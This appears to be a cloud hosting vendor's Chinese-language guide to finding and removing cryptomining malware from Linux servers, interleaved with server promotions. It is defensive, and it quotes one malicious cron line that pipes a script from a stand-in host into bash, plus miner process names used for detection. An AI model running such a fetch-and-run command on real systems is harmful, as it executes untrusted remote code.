TOP云服务器租用特惠活动,4核/4G/15M低至34元/月,8核/16G/30M低至94元/月,CPU有金牌Gold-6152处理器、Platinum 8272CL/8275CL处理器等高端处理器,购买链接:https://c.topyun.vip/cart
你是否发现:
服务器CPU占用长期100%,但查不到是哪个进程?
网站访问变慢,SSH登录卡顿?
收到云服务商的安全告警邮件?
top 命令中看到陌生进程如 xmrig、kdevtmpfsi、systemd(伪装)?
恭喜你,你的服务器很可能已经 被植入挖矿病毒。
挖矿木马会利用你的服务器资源(CPU、内存)为黑客“免费打工”,不仅导致服务瘫痪,还可能被列入黑产名单,影响业务信誉。
本文将提供一套完整应急响应流程,手把手教你清除挖矿程序,恢复系统安全。
一、确认是否被挖矿
🔍 1. 检查CPU使用率
top # 或 htop
观察是否有未知进程持续占用高CPU。
🔍 2. 查找可疑进程名
常见挖矿进程名:
xmrig(门罗币挖矿)
kdevtmpfsi、sysupdate、networkservice
systemd(伪装成系统进程)
aegis、aliyun(伪装成云监控)
ps aux | grep -E "(xmrig|kdevtmpfsi|sysupdate)"
🔍 3. 检查网络连接
netstat -antlp | grep :443 # 或使用 lsof lsof -i :443
查看是否连接到境外IP或矿池地址(如xmr.pool.xxx)。
🔍 4. 检查定时任务
crontab -l # 检查系统级定时任务 cat /etc/crontab ls /etc/cron.d/
挖矿病毒常通过crontab实现持久化。
🔍 5. 检查开机自启项
systemctl list-unit-files --type=service | grep enabled # 查看异常服务 ls /etc/systemd/system/*.service
二、紧急处理:立即止损
✅ 步骤1:断开网络(可选)
如果服务器非关键业务,可临时断网防止扩散:
ifconfig eth0 down # 或在云控制台关闭公网IP
✅ 步骤2:终止挖矿进程
# 根据PID杀死进程 ps aux | grep xmrig kill -9 <PID> # 批量杀死 pkill -f xmrig pkill -f kdevtmpfsi
✅ 步骤3:删除恶意文件
# 删除已知挖矿文件 rm -f /tmp/kdevtmpfsi rm -f /var/tmp/sysupdate rm -rf ~/.ssh/authorized_keys.d # 可能被写入后门 # 删除下载目录 rm -rf /usr/local/lib/.cache
✅ 步骤4:清除定时任务
crontab -r # 清空当前用户任务 # 编辑系统任务 sudo nano /etc/crontab # 删除可疑行,如: # * * * * * curl -s http://malicious.site/x.sh | bash
✅ 步骤5:禁用可疑服务
systemctl stop bad-service.service systemctl disable bad-service.service rm /etc/systemd/system/bad-service.service
三、深度排查与加固
🔍 1. 检查SSH登录日志
# 查看近期登录记录 lastlog # 查看失败登录 grep "Failed password" /var/log/auth.log | tail -50
发现异常IP立即封禁:
iptables -A INPUT -s 1.2.3.4 -j DROP
🔍 2. 修改所有密码
✅ SSH root 密码
✅ MySQL 数据库密码
✅ 网站后台管理员密码
✅ 云平台账户密码
📌 建议:使用强密码(大小写+数字+符号,12位以上)
🔍 3. 关闭密码登录,启用密钥认证
编辑/etc/ssh/sshd_config:
PasswordAuthentication no PubkeyAuthentication yes
重启SSH:
systemctl restart sshd
🔍 4. 更新系统与软件
apt update && apt upgrade -y # 或 yum update -y
🔍 5. 安装安全工具
fail2ban:自动封禁暴力破解IP
apt install fail2ban -y
rkhunter:检测rootkit
apt install rkhunter -y rkhunter --check
✅ 推荐解决方案:选择高防护云服务器,从源头杜绝风险!
我们是自有品牌 【TOP云】,专为开发者打造高安全、高性能的云服务器:
🔥 爆款机型限时特惠:
🟢 建站首选:2核CPU / 4G内存 / 10Mbps带宽 → 仅需 34.8元/月起
(适合个人博客、小型应用)🔴 高性能款:16核CPU / 32G内存 / 30Mbps → 1678.8元/年,折合约148元/月!
(应对高并发、数据库、API服务)
📍 节点位置:湖北襄阳 · 中国电信省级骨干网,全国低延迟
🛡️ 全系标配 200Gbps DDOS 防护 + 秒解防御,实时拦截恶意流量
🔒 底层隔离 + KVM虚拟化,防止横向渗透
🚫 默认禁用高危端口,减少攻击面
四、预防建议:避免再次中招
✅ 定期更新系统和软件
✅ 使用SSH密钥登录,禁用密码
✅ 最小化开放端口(只开80、443、22)
✅ 定期检查 top、crontab、auth.log
✅ 重要数据定期备份,防止勒索病毒
结语
服务器被挖矿不是终点,而是安全意识的起点。
一次入侵可能源于一个弱密码、一个未修复的漏洞。
而一台自带高防、网络纯净、管理便捷的云服务器,能让你少操心、多安心。
现在就来 TOP云,用 34.8元/月 的价格,获得企业级的安全防护!
🔗 立即选购,告别挖矿烦恼:https://c.topyun.vip/cart
📞 技术支持?登录后联系客服,我们提供入侵排查 + 安全加固指导!
—— TOP云 · 安全每一核,稳定每一分
